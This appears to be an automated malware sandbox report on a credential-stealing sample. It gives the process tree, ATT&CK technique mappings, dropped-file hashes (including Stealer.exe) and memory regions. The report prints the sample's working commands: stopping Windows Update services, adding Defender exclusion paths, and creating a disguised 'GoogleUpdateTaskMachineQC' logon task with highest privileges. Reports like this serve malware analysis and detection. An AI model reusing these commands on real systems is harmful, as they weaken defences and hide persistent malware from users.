    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:744
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1212
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3292
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4756
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1724
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of WriteProcessMemory
  PID:452
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2548
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:4896
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:3940
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:5020
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cxqteetr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3672
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:1980
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4108
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4992
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1960
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3344
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:672
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2192
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2556
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of WriteProcessMemory
  PID:3128
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:4120
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:4512
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:4468
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:3292
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cxqteetr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4524
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1724
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  PID:936
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:3828
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Loads dropped DLL
  PID:4856
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#txzsjtgve#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Loads dropped DLL
  PID:3772
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  - Loads dropped DLL
  PID:1220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Loads dropped DLL
  PID:1660
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#txzsjtgve#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Loads dropped DLL
  PID:1440
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  - Loads dropped DLL
  PID:3236
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Loads dropped DLL
  PID:3648
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#txzsjtgve#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Loads dropped DLL
  PID:2364
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  - Loads dropped DLL
  PID:4272
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Loads dropped DLL
  PID:1624
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#txzsjtgve#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Loads dropped DLL
  PID:228
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  - Loads dropped DLL
  PID:4276
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Loads dropped DLL
  PID:1092
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#txzsjtgve#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4524
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:2624

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1256

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
- Loads dropped DLL
PID:1116

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x424 0x2f4
1⤵
- Loads dropped DLL
PID:4324

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0afd13f4692081c780a193f4c772e91d

SHA1
2fc3069b8fc54282f1592ba111f2dd3b3e763d43

SHA256
da6693498867bfe281563449ff0f9469e8829478410bb74aa81b776a3c427c80

SHA512
6ea590e6b64242a0adc6f5b622abb886a62dfd9b71dec748480b0a3fbc2bf3e87b2dc15d2906b62a656b7bd2c11001199e282508cec948eedd07867b0ca108b2

Download Submit
C:\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1a8c1e6b2db552157aee38337198ee68

SHA1
93a7b343e048e570be39b5131efb694ce346f9b1

SHA256
dd376520118b68659f154ad600df11605ed1bee5c96b603b2074a2074d5cf200

SHA512
0a7c28d989bda30d2fefeef86d15b02694e1639d3c06c97148f56eab6da1fcb1062c55f92e6c21d2a6998bb04dfab20d84473ba44fcdade4bdf939f453bef7c5

Download Submit
C:\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
36668ee07ac6454cab220c2be77d3215

SHA1
10d08df3b372e5937e63a93e13e4e8c421a3817e

SHA256
aa2fee6cb539a2c5c9524cfc66d88688d540bb63f4686cb12758fbb70b8a8bd6

SHA512
0aa9e200466b3569bc49bfcb6b49b4621a898b59a315ff6dd7599d43d66c827ac033c88545390a3f9e4a73312d1461b2dd33df68991257828fdfcfc6bc9c8f77

Download Submit
C:\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bcd6a820b77a46ed1e31d2308558d9c3

SHA1
157058ccfa3502c44d1ae14bd2bab765dda555ae

SHA256
63f8541935e3c7b52b095b33ab4942ca7715c36512f3034a5986a51346fd07e0

SHA512
8e4b9e42bef162ce0ffa9f072ad70cc3ff22110325aa109fa9b093a04c46fb56736ea05b9f6919b77f0a36fc08c6a71871ebcb0e30b4b0e9b9a5d6f183eb5fbb

Download Submit
C:\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
80f0ef4c36e78096be549eec17bcbe3e

SHA1
c88a9317ba67f4ecef1c50830e075f327749a107

SHA256
1f84042fea7148e50dfce308863722ec272a2f5d50a04935950e026e5fe1485e

SHA512
1ec5b6ecff330d26c9c38f227f841e1828a22c81e870258b0f88e940aae7a1a043af8ee890d03a46db38e8a5eee2705b9a0fbd558b102f005e776896122d2e9f

Download Submit
C:\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4eaf7b1dfbc687e0616e24fe6f943053

SHA1
abadacda0a034a943db857f68b41f1cce84f57e2

SHA256
179c086e268beba3b1d2a6fee15ab8e10eee4abd30b66d61aada21c14c260a7d

SHA512
cda8787355bbaf5df8f9b3a7e7760823ee7906b26d539b07f49089808e9a31282b784a7977be82b73cabf8dc1260e08923405ce41f6d6cd53bd8396818890026

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Stealer.exe.log

Filesize
1KB

MD5
547df619456b0e94d1b7663cf2f93ccb

SHA1
8807c99005eaf2cc44b0b5ec4fc6eac289bfb4e3

SHA256
8b7130cc966f3f78e236b4e51eb12e1c82b0bd3f0773275d619b5c545168797a

SHA512
01b4e32fdf6c7f2347075c8153bc75a2f32fe3cec19e1a777e263ec4f607b54e046f0e4c7c0bc22581d44cbbdbb076a63eaa50a742f381faad06c86c2b10f67f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\launcher.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ef647504cf229a16d02de14a16241b90

SHA1
81480caca469857eb93c75d494828b81e124fda0

SHA256
47002672443e80410e55a0b6d683573ac27d70d803b57ee3c2818d1008669710

SHA512
a6d8c08c708eee6f7e700880ce79d2ba7cd0acbe8529d96e18f3e90ea1f3cf33fd801dd6eba6017cdd02769e968c48278c090c1deeac710124f79423cd862ee1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
15dde0683cd1ca19785d7262f554ba93

SHA1
d039c577e438546d10ac64837b05da480d06bf69

SHA256
d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

SHA512
57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
74a6b79d36b4aae8b027a218bc6e1af7

SHA1
0350e46c1df6934903c4820a00b0bc4721779e5f

SHA256
60c64f6803d7ad1408d0a8628100470859b16ef332d5f1bd8bb2debe51251d04

SHA512
60e71435a9a23f4c144d641844f4182ddc9aa4ccd3e99232149a187112dce96458aab9587e9fea46f5dc5a52f5ca758969a04657a2b5b10241d3e4554f7c85e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d5995f1ea99b2ca5d2fb9efb4ed4b38a

SHA1
c39bfe9fc241b25f991a45936be88b3e7796d30f

SHA256
b3ee8ecda216c47ffb931b0cd46ebf715502ac773eb76c5b34917bef00b3ee41

SHA512
e25087ad4b751ac431b7bf10146cbb87008b11d9836e4badee2fb239e72b4a3531dd556bca19d066983899ebfacad5b27bb6b24ec4cdc166b1525cda196b87f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
548dd08570d121a65e82abb7171cae1c

SHA1
1a1b5084b3a78f3acd0d811cc79dbcac121217ab

SHA256
cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

SHA512
37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9f63fb63d8cbb69fe22ce22443977c42

SHA1
0851cc90626026b8553d72e3eaa2ccb4e7006d10

SHA256
949456120e82ee451135c5b17c60f93b7bc963c27d0e87f6f67b2f7716c61c2e

SHA512
497c715082064e18189192d034e69c67bd8a0e613d7982ba824657f4d3da8efc4161f3bb12afeb213f76e08cb6fe22688439286d8eb8215e21ae970e9bf8d42c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a8bd41695ca5d0d85f699a7f4a4c66db

SHA1
fd0078bb3c734354319481cfdafb3f6364a14311

SHA256
0874ed4b91f117451ed1b2fa1f1387152b2ecfed2121d2106c7071935338787a

SHA512
544b64648433fda811c00b6c47907b1cae4014e37b06f5ce6264f5dcdc7702694678746a2458b9d78c85ec1ade16304dc195e2d9672b84d7dfa7ac021e7c1f9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
60945d1a2e48da37d4ce8d9c56b6845a

SHA1
83e80a6acbeb44b68b0da00b139471f428a9d6c1

SHA256
314b91c00997034d6e015f40230d90ebbf57de5dc938b62c1a214d591793dbe3

SHA512
5d068f1d6443e26ae3cad1c80f969e50e5860967b314153c4d3b6efd1cfa39f0907c6427bec7fa43db079f258b6357e4e9a1b0b1a36b1481d2049ea0e67909ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
8a507763dc3ca96a10cb133ce59dbc38

SHA1
1da15e342087f1fbdddfb52b6d04c0a227b6814a

SHA256
b308b88b2fb7284ebde039c815bd6e7402427e1ac863e5dbd76802d04659fa0c

SHA512
6c03877a84d2a8b02534a674fda16115c5f39ff6f79fd4b330a9295a5f03f05dde85c0a42819765a8e334b257945fe7c0a49104d6df1a549b184fbb88c985a44

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
311KB

MD5
d2be8b5ab71e40b09b0d87c299350451

SHA1
187249ff0e080ff91ab16022d82e7c044b9638b2

SHA256
97559acaa4dfaa8d88225ade15e76c90d5e857f130aaabc44d60c6ede2afe959

SHA512
ed6465a9bf54432deafa80440be18b4a0e5b091c5c79719cc952fb9501b66e746b1024c6f4795b9e72181e29cac882c0c9eaf6b54875d533eae2274edb7d1c4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ht5iuizf.3d4.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\kaban.exe

Filesize
549KB

MD5
f6feba04f41fba12a5e9f3e610f05ba0

SHA1
fff10a0adf752e7bec16d69ab3d1911a1ea7ffae

SHA256
e116555c068fdfdda264b5ade3846ba4239ff86d82084c88909b3e8509e14ebe

SHA512
11a6f55699cb374ec6c6e8f4442066d7317d9583eeff4555d27472b713015e3e0d26bc6df3f2dd192c10db22377ec3421912c70b20bd8bc509e7df4f31ca9924

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Libs\WR64.sys

Filesize
14KB

MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stealer.exe

Filesize
230KB

MD5
75d1a51d608f2812db4dfb3e00616b4d

SHA1
5ee4157f474de2525afc8f772cb30407bee89998

SHA256
75503a09abbbddd4921e140bc4c9e50bcda02c67f6a078d62aa387c6421c8295

SHA512
a7dd8e26152b7310e745a98f059ecf4115092e4f290f8574fe54df7ded47b7aced7feab72d5a67faadc50a89f7789b477d27447031186cc34701391de9ed9bda

Download Submit
C:\Windows\xdwd.dll

Filesize
136KB

MD5
16e5a492c9c6ae34c59683be9c51fa31

SHA1
97031b41f5c56f371c28ae0d62a2df7d585adaba

SHA256
35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66

SHA512
20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6

Download Submit
memory/228-712-0x000001EE6AAC0000-0x000001EE6AB75000-memory.dmp

Filesize
724KB

Download
memory/936-440-0x00007FF7D6330000-0x00007FF7D635A000-memory.dmp

Filesize
168KB

Download
memory/936-310-0x00007FF7D6330000-0x00007FF7D635A000-memory.dmp

Filesize
168KB

Download
memory/936-357-0x00007FF7D6330000-0x00007FF7D635A000-memory.dmp

Filesize
168KB

Download
memory/936-408-0x00007FF7D6330000-0x00007FF7D635A000-memory.dmp

Filesize
168KB

Download
memory/956-97-0x00000000002E0000-0x0000000000334000-memory.dmp

Filesize
336KB

Download
memory/1256-230-0x00007FF754D50000-0x00007FF758A14000-memory.dmp

Filesize
60.8MB

Download
memory/1660-503-0x000001CBC3BB0000-0x000001CBC3BB6000-memory.dmp

Filesize
24KB

Download
memory/1660-502-0x000001CBC3B80000-0x000001CBC3B88000-memory.dmp

Filesize
32KB

Download
memory/1660-501-0x000001CBC3BD0000-0x000001CBC3BEA000-memory.dmp

Filesize
104KB

Download
memory/1660-500-0x000001CBC3B70000-0x000001CBC3B7A000-memory.dmp

Filesize
40KB

Download
memory/1660-486-0x000001CBC3F10000-0x000001CBC3FC5000-memory.dmp

Filesize
724KB

Download
memory/1660-504-0x000001CBC3BC0000-0x000001CBC3BCA000-memory.dmp

Filesize
40KB

Download
memory/2044-142-0x000001D131370000-0x000001D1313E6000-memory.dmp

Filesize
472KB

Download
memory/2044-187-0x000001D131320000-0x000001D13132A000-memory.dmp

Filesize
40KB

Download
memory/2044-73-0x000001D116C30000-0x000001D116C70000-memory.dmp

Filesize
256KB

Download
memory/2044-144-0x000001D1312F0000-0x000001D13130E000-memory.dmp

Filesize
120KB

Download
memory/2044-188-0x000001D131350000-0x000001D131362000-memory.dmp

Filesize
72KB

Download
memory/2044-143-0x000001D1313F0000-0x000001D131440000-memory.dmp

Filesize
320KB

Download
memory/3412-19-0x00007FFC0D290000-0x00007FFC0DD51000-memory.dmp

Filesize
10.8MB

Download
memory/3412-0-0x00007FFC0D293000-0x00007FFC0D295000-memory.dmp

Filesize
8KB

Download
memory/3412-1-0x0000000000500000-0x0000000002D0E000-memory.dmp

Filesize
40.1MB

Download
memory/3412-98-0x00007FFC0D290000-0x00007FFC0DD51000-memory.dmp

Filesize
10.8MB

Download
